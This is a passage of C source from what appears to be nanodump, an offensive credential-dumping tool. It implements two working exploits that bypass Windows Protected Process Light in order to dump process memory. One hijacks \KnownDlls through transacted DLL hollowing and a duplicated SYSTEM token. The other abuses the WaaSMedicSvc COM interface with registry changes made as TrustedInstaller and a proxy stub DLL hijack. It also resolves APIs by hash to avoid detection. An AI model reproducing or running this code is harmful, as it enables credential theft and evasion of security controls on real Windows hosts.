        PRINT_ERR("The symbolic link '\\KnownDlls\\%ls' was not created.", pwszDllToHijack);
        goto end;
    }

    DPRINT("The symbolic link was successfully created: '\\KnownDlls\\%ls' -> '%ls'", pwszDllToHijack, pwszDosDeviceTargetPath);

    //
    // 5. Create the image section object at the target location for an arbitrary DLL.
    //
    //    Final piece of the puzzle. Now that we have a symbolic link in \KnownDlls that points to
    //    an arbitrary location, we just have to create a new Section at this location and map our
    //    payload DLL.
    //
    pwszSectionName = pwszDosDeviceTargetPath;

    success = map_dll(
        nanodump_ppl_dump_dll,
        nanodump_ppl_dump_dll_len,
        pwszSectionName,
        &hDllSection,
        &hTransaction);
    if (!success)
    {
        DPRINT_ERR("Failed to map the DLL.");
        goto end;
    }

    DPRINT("Mapped payload DLL to: '%ls'", pwszSectionName);

    //
    // 6. Create a PPL process and hijack one of the DLLs it tries to load
    //
    //    First we need to prepare the command line that we are going to execute.
    //    Then we need to get a SYSTEM token to start our new process. If the current process was 
    //    started as SYSTEM, we can simply copy this token. If SYSTEM was impersonated, we need to
    //    copy the current thread's token.
    //    Finally, we can start our protected process with the prepared command line and the 
    //    duplicated token.
    //
    success = prepare_ppl_command_line(
        dump_path,
        use_valid_sig,
        duplicate_handle,
        &pwszCommandLine);
    if (!success)
        goto end;
    DPRINT("command line: %ls", pwszCommandLine);

    if (bCurrentUserIsSystem)
    {
        status = NtOpenProcessToken(
            NtCurrentProcess(),
            TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ADJUST_PRIVILEGES,
            &hCurrentToken);
        if (!NT_SUCCESS(status))
        {
            syscall_failed("NtOpenProcessToken", status);
            goto end;
        }
    }
    else
    {
        status = NtOpenThreadToken(
            NtCurrentThread(),
            TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ADJUST_PRIVILEGES,
            FALSE,
            &hCurrentToken);
        if (!NT_SUCCESS(status))
        {
            syscall_failed("NtOpenThreadToken", status);
            goto end;
        }
    }

    DPRINT("Enable privilege SeAssignPrimaryTokenPrivilege");

    success = check_token_privilege(
        hCurrentToken,
        L"SeAssignPrimaryTokenPrivilege",
        TRUE);
    if (!success)
    {
        DPRINT_ERR("Could not enable SeAssignPrimaryTokenPrivilege");
        goto end;
    }

    DPRINT("Create a primary token");

    InitializeObjectAttributes(&TokenObjectAttributes, NULL, 0, NULL, NULL);
    Qos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);
    Qos.ImpersonationLevel = SecurityAnonymous;
    Qos.ContextTrackingMode = 0;
    Qos.EffectiveOnly = FALSE;
    TokenObjectAttributes.SecurityQualityOfService = &Qos;

    status = NtDuplicateToken(
        hCurrentToken,
        MAXIMUM_ALLOWED,
        &TokenObjectAttributes,
        FALSE,
        TokenPrimary,
        &hNewProcessToken);
    if (!success)
    {
        syscall_failed("NtDuplicateToken", status);
        goto end;
    }

    DPRINT("Create protected process with command line: %ls", pwszCommandLine);

    success = create_protected_process_as_user(
        hNewProcessToken,
        pwszCommandLine,
        &hNewProcess);
    if (!success)
    {
        PRINT_ERR("Failed to create the PPL process");
        goto end;
    }

    DATA_FREE(pwszCommandLine, wcslen(pwszCommandLine) * sizeof(WCHAR));

    success = wait_for_process(hNewProcess);
    if (!success)
        goto end;

    DPRINT("Done.");

    NtClose(hNewProcess); hNewProcess = NULL;
    NtClose(hDllSection); hDllSection = NULL;

    DPRINT("Unmapped section '%ls'", pwszSectionName);

    if (bImpersonationActive)
    {
        RevertToSelf(); // If impersonation was active, drop it first
        bImpersonationActive = FALSE;
    }

    if (!file_exists(dump_path))
    {
        PRINT_ERR("Failed, the dump was not created.");
        goto end;
    }

    print_success(
        dump_path,
        use_valid_sig,
        TRUE);

    bReturnValue = TRUE;

end:
    if (bImpersonationActive && RevertToSelf)
        RevertToSelf(); // If impersonation was active, drop it first
    if (hNewProcessToken)
        NtClose(hNewProcessToken);
    if (pwszCommandLine)
    {
        DATA_FREE(pwszCommandLine, wcslen(pwszCommandLine) * sizeof(WCHAR));
    }
    if (pwszDosDeviceName)
    {
        DATA_FREE(pwszDosDeviceName, wcslen(pwszDosDeviceName) * sizeof(WCHAR));
    }
    if (pwszDosDeviceTargetPath)
    {
        DATA_FREE(pwszDosDeviceTargetPath, wcslen(pwszDosDeviceTargetPath) * sizeof(WCHAR));
    }
    if (hDllLink)
        NtClose(hDllLink);
    if (pwszDllLinkName)
    {
        DATA_FREE(pwszDllLinkName, wcslen(pwszDllLinkName) * sizeof(WCHAR));
    }
    if (hKnownDllsObjDir)
        NtClose(hKnownDllsObjDir);
    if (hLocalServiceToken)
        NtClose(hLocalServiceToken);
    if (hSystemToken)
        NtClose(hSystemToken);
    if (pwszDllToHijack)
    {
        DATA_FREE(pwszDllToHijack, wcslen(pwszDllToHijack) * sizeof(WCHAR));
    }
    if (hDllSection)
        NtClose(hDllSection);
    if (hNewProcess)
        NtClose(hNewProcess);
    if (hTransaction)
        NtClose(hTransaction);

    return bReturnValue;
}

BOOL create_protected_process_as_user(
    IN HANDLE hToken,
    IN LPWSTR pwszCommandLine,
    OUT PHANDLE phProcess)
{
    STARTUPINFOW si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    BOOL success;
    CreateProcessAsUserW_t CreateProcessAsUserW;
    *phProcess = NULL;

    CreateProcessAsUserW = (CreateProcessAsUserW_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        CreateProcessAsUserW_SW2_HASH,
        0);
    if (!CreateProcessAsUserW)
    {
        api_not_found("CreateProcessAsUserW");
        return FALSE;
    }

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);

    success = CreateProcessAsUserW(
        hToken,
        NULL,
        pwszCommandLine,
        NULL,
        NULL,
        TRUE,
        CREATE_PROTECTED_PROCESS,
        NULL,
        NULL,
        &si,
        &pi);
    if (!success)
    {
        function_failed("CreateProcessAsUserW");
        return FALSE;
    }

    NtClose(pi.hThread); pi.hThread = NULL;
    *phProcess = pi.hProcess;

    return TRUE;
}

BOOL prepare_ppl_command_line(
    IN LPCSTR dump_path,
    IN BOOL use_valid_sig,
    IN BOOL duplicate_handle,
    OUT LPWSTR* command_line)
{
    WCHAR wszSystemDir[MAX_PATH] = { 0 };
    WCHAR dump_path_w[MAX_PATH] = { 0 };
    size_t size = 32767;
    GetSystemDirectoryW_t GetSystemDirectoryW;

    GetSystemDirectoryW = (GetSystemDirectoryW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        GetSystemDirectoryW_SW2_HASH,
        0);
    if (!GetSystemDirectoryW)
    {
        api_not_found("GetSystemDirectoryW");
        return FALSE;
    }

    *command_line = intAlloc(size * sizeof(WCHAR));
    if (!*command_line)
    {
        malloc_failed();
        return FALSE;
    }

    // program path
    GetSystemDirectoryW(wszSystemDir, MAX_PATH);
    wcsncpy(*command_line, wszSystemDir, size);
    wcsncat(*command_line, L"\\", size);
    wcsncat(*command_line, PPL_BINARY, size);
    // dump path
    mbstowcs(dump_path_w, dump_path, MAX_PATH);
    wcsncat(*command_line, L" -w ", size);
    wcsncat(*command_line, dump_path_w, size);
    // --valid
    if (use_valid_sig)
        wcsncat(*command_line, L" -v", size);
    // --dup
    if (duplicate_handle)
        wcsncat(*command_line, L" -d", size);

    return TRUE;
}

BOOL find_file_for_transaction(
    IN DWORD dwMinSize,
    OUT LPWSTR* ppwszFilePath)
{
    BOOL bReturnValue = FALSE;
    WCHAR wszSystemDir[MAX_PATH] = { 0 };
    WCHAR wszSearchPath[MAX_PATH] = { 0 };
    WCHAR wszFilePath[MAX_PATH] = { 0 };
    WIN32_FIND_DATAW wfd = { 0 };
    UNICODE_STRING name = { 0 };
    HANDLE hFind = NULL;
    HANDLE hFile = NULL;
    PSID pSidOwner = NULL;
    PSECURITY_DESCRIPTOR pSD = NULL;
    DWORD dwFileSize = 0;
    PSID pSidTarget = NULL;
    ConvertStringSidToSidW_t ConvertStringSidToSidW;
    GetSecurityInfo_t GetSecurityInfo;
    GetSystemDirectoryW_t GetSystemDirectoryW;
    FindFirstFileW_t FindFirstFileW;
    FindNextFileW_t FindNextFileW;
    FindClose_t FindClose;
    OBJECT_ATTRIBUTES oa = { 0 };
    IO_STATUS_BLOCK IoStatusBlock;
    BOOL success;
    DWORD error_code;

    ConvertStringSidToSidW = (ConvertStringSidToSidW_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        ConvertStringSidToSidW_SW2_HASH,
        0);
    if (!ConvertStringSidToSidW)
    {
        api_not_found("ConvertStringSidToSidW");
        return FALSE;
    }

    GetSecurityInfo = (GetSecurityInfo_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        GetSecurityInfo_SW2_HASH,
        0);
    if (!GetSecurityInfo)
    {
        api_not_found("GetSecurityInfo");
        return FALSE;
    }

    GetSystemDirectoryW = (GetSystemDirectoryW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        GetSystemDirectoryW_SW2_HASH,
        0);
    if (!GetSystemDirectoryW)
    {
        api_not_found("GetSystemDirectoryW");
        return FALSE;
    }

    FindClose = (FindClose_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        FindClose_SW2_HASH,
        0);
    if (!FindClose)
    {
        api_not_found("FindClose");
        return FALSE;
    }

    FindFirstFileW = (FindFirstFileW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        FindFirstFileW_SW2_HASH,
        0);
    if (!FindFirstFileW)
    {
        api_not_found("FindFirstFileW");
        return FALSE;
    }

    FindNextFileW = (FindNextFileW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        FindNextFileW_SW2_HASH,
        0);
    if (!FindNextFileW)
    {
        api_not_found("FindNextFileW");
        return FALSE;
    }

    ConvertStringSidToSidW(L"S-1-5-18", &pSidTarget);

    GetSystemDirectoryW(wszSystemDir, MAX_PATH);    // C:\Windows\System32
    wcsncpy(wszSearchPath, wszSystemDir, MAX_PATH);
    wcsncat(wszSearchPath, L"\\*.dll", MAX_PATH);   // C:\Windows\System32\*.dll

    hFind = FindFirstFileW(wszSearchPath, &wfd);
    if (hFind == INVALID_HANDLE_VALUE)
        return FALSE;

    do
    {
        wcsncpy(wszFilePath, L"\\??\\", MAX_PATH);
        wcsncat(wszFilePath, wszSystemDir, MAX_PATH);
        wcsncat(wszFilePath, L"\\", MAX_PATH);
        wcsncat(wszFilePath, wfd.cFileName, MAX_PATH);
        name.Buffer  = wszFilePath;
        name.Length  = (USHORT)wcsnlen(name.Buffer, MAX_PATH);;
        name.Length *= 2;
        name.MaximumLength = name.Length + 2;
        InitializeObjectAttributes(&oa, &name, OBJ_CASE_INSENSITIVE, NULL, NULL);

        NTSTATUS status = NtCreateFile(
            &hFile,
            FILE_GENERIC_READ,
            &oa,
            &IoStatusBlock,
            NULL,
            FILE_ATTRIBUTE_NORMAL,
            FILE_SHARE_READ,
            FILE_OPEN,
            FILE_SYNCHRONOUS_IO_NONALERT,
            NULL,
            0);
        if (NT_SUCCESS(status))
        {
            success = get_file_size(hFile, &dwFileSize);
            if (success && dwFileSize > dwMinSize)
            {
                // TODO: use a lower level API?
                error_code = GetSecurityInfo(
                    hFile,
                    SE_FILE_OBJECT,
                    OWNER_SECURITY_INFORMATION,
                    &pSidOwner,
                    NULL,
                    NULL,
                    NULL,
                    &pSD);
                if (error_code == ERROR_SUCCESS)
                {
                    success = token_compare_sids(
                        pSidOwner,
                        pSidTarget);
                    if (success)
                    {
                        *ppwszFilePath = intAlloc(MAX_PATH * sizeof(WCHAR));
                        if (*ppwszFilePath)
                        {
                            wcsncpy(*ppwszFilePath, wszFilePath, MAX_PATH);
                            bReturnValue = TRUE;
                        }
                    }
                }
            }
            NtClose(hFile); hFile = NULL;
        }
    } while (!bReturnValue && FindNextFileW(hFind, &wfd));

    FindClose(hFind); hFind = NULL;

    return bReturnValue;
}

BOOL write_payload_dll_transacted(
    IN unsigned char nanodump_ppl_dump_dll[],
    IN unsigned int nanodump_ppl_dump_dll_len,
    OUT PHANDLE pdhFile,
    OUT PHANDLE phTransaction)
{
    //
    // This implementation was inspired by the DLL Hollowing technique, discussed by @_ForrestOrr
    // in this blog post: Masking Malicious Memory Artifacts – Part I: Phantom DLL Hollowing
    // https://www.forrest-orr.net/post/malicious-memory-artifacts-part-i-dll-hollowing
    // This trick is awesome! :)
    //
    // Here is the idea. Rather than writing our embedded DLL to disk, we open an existing DLL file
    // as a transaction operation. Then, we replace the content of the DLL with our own. To so, we
    // search for an existing DLL file in C:\Windows\System32. We assume we are executing this code
    // as SYSTEM but still, this is not sufficient as we need to open the target file with write 
    // access even though the file will not be modified. As most of the files are owned by Trusted-
    // Installer, we need to find one which is owned by SYSTEM and also make sure that it is big
    // enough so that we can copy our own DLL.
    //
    // Note: actually, in our case, it doesn't matter whether the target file is a DLL or a regular
    // file. But hey, this works just fine. ;)
    //

    BOOL bReturnValue = FALSE;
    LPWSTR pwszTargetFile = NULL;
    NTSTATUS status = 0;
    OBJECT_ATTRIBUTES oa = { sizeof(OBJECT_ATTRIBUTES) };
    HANDLE hTransaction = NULL;
    HANDLE hTransactedFile = NULL;
    BOOL success = FALSE;
    IO_STATUS_BLOCK IoStatusBlock;
    CreateFileTransactedW_t CreateFileTransactedW;

    CreateFileTransactedW = (CreateFileTransactedW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        CreateFileTransactedW_SW2_HASH,
        0);
    if (!CreateFileTransactedW)
    {
        api_not_found("CreateFileTransactedW");
        goto end;
    }

    //
    // Find a legtimate DLL file to "hollow". It must not be owned by TrustedInstaller and it must
    // be big enough so that we can copy our payload into the transacted file.
    //
    success = find_file_for_transaction(
        nanodump_ppl_dump_dll_len,
        &pwszTargetFile);
    if (!success)
    {
        PRINT_ERR("Could not find file for transaction");
        goto end;
    }

    DPRINT("Found file for transaction: %ls", pwszTargetFile);

    status = NtCreateTransaction(
        &hTransaction,
        TRANSACTION_ALL_ACCESS,
        &oa,
        NULL,
        NULL,
        0,
        0,
        0,
        NULL,
        NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateTransaction", status);
        goto end;
    }

    //
    // Open a legitimate DLL file as a transaction operation.
    //
    hTransactedFile = CreateFileTransactedW(
        pwszTargetFile,
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL,
        hTransaction,
        NULL,
        NULL);
    if (hTransactedFile == INVALID_HANDLE_VALUE)
    {
        function_failed("CreateFileTransactedW");
        goto end;
    }

    DPRINT("Opened file '%ls' for transaction.", pwszTargetFile);

    //
    // Replace the content of the legitimate file with our own DLL payload. It's important to note
    // that the file on disk is not altered.
    //
    status = NtWriteFile(
        hTransactedFile,
        NULL,
        NULL,
        NULL,
        &IoStatusBlock,
        nanodump_ppl_dump_dll,
        nanodump_ppl_dump_dll_len,
        NULL,
        NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtWriteFile", status);
        goto end;
    }

    DPRINT("Wrote 0x%x bytes of embedded payload DLL to transacted file %ls.", nanodump_ppl_dump_dll_len, pwszTargetFile);

    *pdhFile = hTransactedFile;
    *phTransaction = hTransaction;
    bReturnValue = TRUE;

end:
    if (pwszTargetFile)
    {
        DATA_FREE(pwszTargetFile, wcslen(pwszTargetFile) * sizeof(WCHAR));
    }

    return bReturnValue;
}

BOOL map_dll(
    IN unsigned char nanodump_ppl_dump_dll[],
    IN unsigned int nanodump_ppl_dump_dll_len,
    IN LPWSTR pwszSectionName,
    OUT PHANDLE phSection,
    OUT PHANDLE phTransaction)
{
    BOOL bReturnValue = FALSE;
    OBJECT_ATTRIBUTES oa = { 0 };
    UNICODE_STRING sectionName = { 0 };
    NTSTATUS status = 0;
    HANDLE hSection = NULL;
    BOOL success;
    HANDLE hDllTransacted = NULL;
    *phSection = NULL;

    success = write_payload_dll_transacted(
        nanodump_ppl_dump_dll,
        nanodump_ppl_dump_dll_len,
        &hDllTransacted,
        phTransaction);
    if (!success)
        goto end;

    sectionName.Buffer  = pwszSectionName;
    sectionName.Length  = (USHORT)wcsnlen(sectionName.Buffer, MAX_PATH);;
    sectionName.Length *= 2;
    sectionName.MaximumLength = sectionName.Length + 2;
    InitializeObjectAttributes(&oa, &sectionName, OBJ_CASE_INSENSITIVE, NULL, NULL);

    //
    // According to the documentation, the SEC_IMAGE attribute must be combined with the page 
    // protection value PAGE_READONLY. But the page protection has actually no effect because the 
    // page protection is determined by the executable file itself.
    // https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createfilemappinga
    //
    status = NtCreateSection(
        &hSection,
        SECTION_ALL_ACCESS,
        &oa,
        NULL,
        PAGE_READONLY,
        SEC_IMAGE,
        hDllTransacted);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateSection", status);
        goto end;
    }

    *phSection = hSection;
    bReturnValue = TRUE;

end:
    if (hDllTransacted)
        NtClose(hDllTransacted);

    return bReturnValue;
}

BOOL check_ppl_requirements(VOID)
{
    BOOL success = FALSE;

    LPCWSTR ppwszRequiredPrivileges[2] = {
        L"SeDebugPrivilege",
        L"SeImpersonatePrivilege"
    };

    success = check_token_privileges(
        NULL,
        ppwszRequiredPrivileges,
        ARRAY_SIZE(ppwszRequiredPrivileges),
        TRUE);
    if (!success)
        return FALSE;

    // Check windows version >= 6.3
    if (!is_win_6_point_3_or_grater())
    {
        PRINT_ERR("The Windows version must be 6.3 or greater");
        return FALSE;
    }

    return TRUE;
}

BOOL get_hijackeable_dllname(
    OUT LPWSTR* ppwszDllName)
{
    if (!ppwszDllName)
        return FALSE;

    *ppwszDllName = intAlloc(64 * sizeof(WCHAR));
    if (!*ppwszDllName)
    {
        malloc_failed();
        return FALSE;
    }

    if (is_win_10_or_grater())
    {
        wcsncpy(*ppwszDllName, DLL_TO_HIJACK_WIN10, 64);
        return TRUE;
    }

    if (is_win_6_point_3_or_grater())
    {
        wcsncpy(*ppwszDllName, DLL_TO_HIJACK_WIN63, 64);
        return TRUE;
    }

    DPRINT_ERR("Invalid Windows version");

    DATA_FREE(*ppwszDllName, 64 * sizeof(WCHAR));

    return FALSE;
}


================================================
FILE: Creds-BOF/nanodump/source/ppl/ppl_medic.c
================================================
#include "ppl/ppl_medic.h"
#include "ppl/ppl_utils.h"
#include "ppl/ppl_medic_client.h"
#include "pipe.h"

BOOL run_ppl_medic_exploit(
    IN unsigned char nanodump_ppl_medic_dll[],
    IN unsigned int nanodump_ppl_medic_dll_len,
    IN LPSTR dump_path,
    IN BOOL use_valid_sig,
    IN BOOL elevate_handle)
{
    BOOL       success                      = FALSE;
    BOOL       ret_val                      = FALSE;
    BOOL       StateTypeLibCreated          = FALSE;
#if PASS_PARAMS_VIA_NAMED_PIPES == 1
    BOOL       dump_worked                  = FALSE;
    HANDLE     hPipe                        = NULL;
#endif
    HANDLE     hBaseNamedObjects            = NULL;
    LPWSTR     TypeLibPath                  = NULL;
    LPWSTR     TypeLibRegValuePath          = NULL;
    LPWSTR     TypeLibOrigPath              = NULL;
    LPWSTR     HollowedDllPath              = NULL;
    LPWSTR     HijackedDllName              = NULL;
    LPWSTR     HijackedDllSectionPath       = NULL;
    LPWSTR     ProxyStubRegValuePath        = NULL;
    LPWSTR     ProxyStubOrigPath            = NULL;
    LPWSTR     WaaSMedicCapsulePath         = NULL;
    HANDLE     hTI                          = NULL;
    BOOL       StateRegTypeLibModified      = FALSE;
    BOOL       StateRegProxyStubModified    = FALSE;
    BOOL       StatePluginDllLocked         = FALSE;
    PVOID      KnownDllDirectoryHandleAddr  = NULL;
    HANDLE     DllSectionHandle             = NULL;
    HANDLE     DummyDllFileHandle           = NULL;
    HANDLE     WaaSMedicCapsuleHandle       = NULL;
    HANDLE     ProxyStubDllLoadEventHandle  = NULL;
    PFILE_LIST TemporaryDiretoriesBefore    = NULL;
    PFILE_LIST TemporaryDiretoriesAfter     = NULL;
    DWORD64    WriteAtLaunchDetectionOnly   = 0;
    DWORD64    WriteAtLaunchRemediationOnly = 0;
    ULONG32    i                            = 0;

    PIWaaSRemediationEx IWaaSRemediationEx = NULL;

    DISPID DispIdLaunchDetectionOnly   = 0;
    DISPID DispIdLaunchRemediationOnly = 0;

    success = enable_debug_priv();
    if (!success)
        goto cleanup;

    //
    // If WaaSMedicSvc is running, stop it first and then start it. We want to make sure we are
    // working in a "clean" environment. This is important to ensure that TaskSchdPS.dll is not
    // already loaded.
    //

    success = restart_waa_s_medic_svc();
    if (!success)
        goto cleanup;

    DPRINT("Service (re)started: %ls", STR_WAASMEDIC_SVC);

    //
    // Determine the value of the \BaseNamedObjects directory handle in the WaaSMedic process.
    // This will help us choose the strategy to adopt for the memory write.
    //

    success = find_waa_s_medic_svc_base_named_objects_handle(&hBaseNamedObjects);
    if (!success)
        goto cleanup;

    DPRINT("Directory handle value in remote process: 0x%04x", (ULONG32)(ULONG_PTR)hBaseNamedObjects);

    //
    // Create the TypeLib file, and modify the registry as TrustedInstaller to replace the 
    // original TypeLib file path.
    //

    success = generate_temp_path(&TypeLibPath);
    if (!success)
        goto cleanup;

    success = write_type_lib(TypeLibPath);
    if (!success)
        goto cleanup;

    StateTypeLibCreated = TRUE;

    success = get_type_lib_reg_value_path(&TypeLibRegValuePath);
    if (!success)
        goto cleanup;

    success = get_type_lib_orig_path(TypeLibRegValuePath, &TypeLibOrigPath);
    if (!success)
        goto cleanup;

    success = get_trusted_installer_token(&hTI);
    if (!success)
        goto cleanup;

    success = modify_type_lib_registry_value(
        TypeLibPath,
        TypeLibRegValuePath,
        hTI,
        &StateRegTypeLibModified);
    if (!success)
        goto cleanup;

    DPRINT("TypeLib file created and set in the registry: %ls", TypeLibPath);

    //
    // Determine the address of the \KnownDlls directory handle. We need this information to
    // know where to write in the target process.
    //

    success = get_known_dlls_handle_address(&KnownDllDirectoryHandleAddr);
    if (!success)
    {
        DPRINT_ERR("Failed to determine the address of LdrpKnownDllDirectoryHandle");
        goto cleanup;
    }

    DPRINT("Known DLL Directory handle @ 0x%p", KnownDllDirectoryHandleAddr);

    success = calculate_write_addresses(KnownDllDirectoryHandleAddr, (ULONG32)(ULONG_PTR)hBaseNamedObjects, &WriteAtLaunchDetectionOnly, &WriteAtLaunchRemediationOnly);
    if (!success)
        goto cleanup;

    //
    // We will prepare the DLL hijacking of the 'TaskSchdPS.dll' DLL by 1. creating a section
    // in the object manager for our own DLL with a random name in the \BaseNamedObjects
    // directory, 2. modifying the registry to set this DLL as the Proxy Stub DLL for the
    // ITaskHandler interface.
    //

    success = get_hijacked_dll_name(&HijackedDllName, &HijackedDllSectionPath);
    if (!success)
        goto cleanup;

    success = map_payload_dll(nanodump_ppl_medic_dll, nanodump_ppl_medic_dll_len, HijackedDllName, HijackedDllSectionPath, &HollowedDllPath, &DllSectionHandle);
    if (!success)
        goto cleanup;

    success = create_dummy_dll_file(HijackedDllName, &DummyDllFileHandle);
    if (!success)
        goto cleanup;

    success = find_proxy_stub_registry_value_path(&ProxyStubRegValuePath);
    if (!success)
        goto cleanup;

    success = get_proxy_stub_orig_path(ProxyStubRegValuePath, &ProxyStubOrigPath);
    if (!success)
        goto cleanup;

    success = modify_proxy_stub_registry_value(hTI, ProxyStubRegValuePath, HijackedDllName, &StateRegProxyStubModified);
    if (!success)
        goto cleanup;

    DPRINT("Proxy/Stub DLL path set in the registry: %ls", HijackedDllName);

    //
    // The methods LaunchDetectionOnly and LaunchRemediationOnly both call the internal function
    // LoadPluginLibrary, which ultimately calls the LoadLibrary(Ex) API. This API throws an
    // exception if the KnownDlls handle is invalid. By locking the target DLL file, we can
    // force the service to fail before calling LoadLibrary(Ex) and therefore avoid the crash.
    // Another benefit is that it drastically increases the speed of the exploit.
    //

    success = get_waa_s_medic_capsule_path(&WaaSMedicCapsulePath);
    success = lock_plugin_dll(WaaSMedicCapsulePath, &StatePluginDllLocked, &WaaSMedicCapsuleHandle);
    if (!success)
        goto cleanup;

    DPRINT("Plugin DLL file locked: %ls", WaaSMedicCapsulePath);

    //
    // Prepare synchronization. We create a global Event, and start a watcher thread that waits
    // for it to be signaled in a loop.
    //

    success = create_load_event(
        STR_IPC_WAASMEDIC_LOAD_EVENT_NAME,
        &ProxyStubDllLoadEventHandle);
    if (!success)
        goto cleanup;

    //
    // Here we start writing random handle values where the \KnownDlls hande is normally stored in
    // a loop. After each write, we attempt to create a remote TaskHandler object. When this object
    // is created, the TaskSchdPS.dll DLL is loaded. So, if the handle value is correct, our version
    // of TaskSchdPS.dll should be loaded (as a "Known DLL"). Otherwise, the handle is not valid and
    // we repeat the operation until we succeed or we reach the maximum number of attempts.
    //

    success = enumerate_temporary_directories(&TemporaryDiretoriesBefore);
    if (!success)
        goto cleanup;

    success = initialize_interface(&IWaaSRemediationEx);
    if (!success)
        goto cleanup;

    success = resolve_dispatch_ids(IWaaSRemediationEx, &DispIdLaunchDetectionOnly, &DispIdLaunchRemediationOnly);
    if (!success)
        goto cleanup;

    success = write_remote_dll_search_path_flag(IWaaSRemediationEx, DispIdLaunchRemediationOnly);
    if (!success)
        goto cleanup;

    DPRINT("Remote DLL search path flag overwritten.");

    DPRINT("Trying to write a valid object directory handle...");

    for (i = 0; i < MAX_ATTEMPTS; i++)
    {
        if ((i + 1) % 100 == 0)
        {
            DPRINT("Attempt %3d/%d (%d%%)", i + 1, MAX_ATTEMPTS, ((i + 1) * 100) / MAX_ATTEMPTS);
        }

        success = write_remote_known_dll_handle(
            IWaaSRemediationEx,
            (ULONG32)(ULONG_PTR)hBaseNamedObjects,
            DispIdLaunchDetectionOnly,
            DispIdLaunchRemediationOnly,
            WriteAtLaunchDetectionOnly,
            WriteAtLaunchRemediationOnly);
        if (!success)
            goto cleanup;

        if (!create_task_handler_instance())
        {
            if (!is_service_running(STR_WAASMEDIC_SVC))
            {
                PRINT_ERR("Service %ls is no longer running, it probably crashed because of an invalid handle value.", STR_WAASMEDIC_SVC);
                goto cleanup;
            }
        }

        if (is_proxy_stub_dll_loaded(ProxyStubDllLoadEventHandle))
        {
            DPRINT("Payload DLL successfully loaded after %d attempts!", i + 1);
            ret_val = TRUE;
            break;
        }
    }

    if (ret_val)
    {
#if !defined(PASS_PARAMS_VIA_NAMED_PIPES) || (PASS_PARAMS_VIA_NAMED_PIPES == 0)
        PRINT("The exploit was successfull!");
        PRINT("By default, the minidump will have an invalid signature and will be written at the path C:\\Windows\\Temp\\report.docx");
#else
        success = client_connect_to_named_pipe(
            IPC_PIPE_NAME,
            &hPipe);
        if (!success)
            goto cleanup;

        success = client_send_arguments_from_pipe(
            hPipe,
            dump_path,
            use_valid_sig,
            elevate_handle);
        if (!success)
            goto cleanup;

        success = client_recv_success(
            hPipe,
            &dump_worked);

        if (success && dump_worked)
        {
            print_success(
                dump_path,
                use_valid_sig,
                TRUE);
        }
        else
        {
            PRINT_ERR("The exploit worked but the DLL could not create the minidump");
        }
#endif
    }

cleanup:
    if (!ret_val && i >= MAX_ATTEMPTS)
    {
        PRINT_ERR("Reached the maximum number of attempts.");
    }
    else if (!ret_val)
    {
        PRINT_ERR("The exploit failed.");
    }

    if (StateRegTypeLibModified)
    {
        modify_type_lib_registry_value(
            TypeLibOrigPath,
            TypeLibRegValuePath,
            hTI,
            NULL);
    }

    if (StateRegProxyStubModified)
    {
        modify_proxy_stub_registry_value(
            hTI,
            ProxyStubRegValuePath,
            ProxyStubOrigPath,
            NULL);
    }

    enumerate_temporary_directories(&TemporaryDiretoriesAfter);
    cleanup_temp_directories(TemporaryDiretoriesBefore, TemporaryDiretoriesAfter);

    free_directory_list(TemporaryDiretoriesBefore);
    TemporaryDiretoriesBefore = NULL;

    free_directory_list(TemporaryDiretoriesAfter);
    TemporaryDiretoriesAfter = NULL;

    if (hBaseNamedObjects)
        NtClose(hBaseNamedObjects);
    if (TypeLibRegValuePath)
        intFree(TypeLibRegValuePath);
    if (TypeLibOrigPath)
        intFree(TypeLibOrigPath);
    if (hTI)
        NtClose(hTI);
    if (DllSectionHandle)
        NtClose(DllSectionHandle);
    if (DummyDllFileHandle)
        NtClose(DummyDllFileHandle);
    if (ProxyStubRegValuePath)
        intFree(ProxyStubRegValuePath);
    if (ProxyStubOrigPath)
        intFree(ProxyStubOrigPath);
    if (StatePluginDllLocked)
        unlock_plugin_dll(WaaSMedicCapsuleHandle);
    if (WaaSMedicCapsuleHandle)
        NtClose(WaaSMedicCapsuleHandle);
    if (WaaSMedicCapsulePath)
        intFree(WaaSMedicCapsulePath);
    if (IWaaSRemediationEx)
        release_client(IWaaSRemediationEx);
    if (ProxyStubDllLoadEventHandle)
        NtClose(ProxyStubDllLoadEventHandle);
    if (HollowedDllPath)
        intFree(HollowedDllPath);
    if (HijackedDllName)
        intFree(HijackedDllName);
    if (HijackedDllSectionPath)
        intFree(HijackedDllSectionPath);
    if (StateTypeLibCreated)
        delete_type_lib(TypeLibPath);
    if (TypeLibPath)
        intFree(TypeLibPath);
    if (is_service_running(STR_WAASMEDIC_SVC))
        stop_service_by_name(STR_WAASMEDIC_SVC, TRUE);
#if PASS_PARAMS_VIA_NAMED_PIPES == 1
    if (hPipe)
        NtClose(hPipe);
#endif

    DPRINT("bye!")

    return ret_val;
}

BOOL create_load_event(
    IN LPWSTR event_name,
    OUT PHANDLE ProxyStubDllLoadEventHandle)
{
    BOOL   ret_val                   = FALSE;
    LPWSTR ProxyStubDllLoadEventName = NULL;

    CreateEventW_t CreateEventW = NULL;

    CreateEventW = (CreateEventW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        CreateEventW_SW2_HASH,
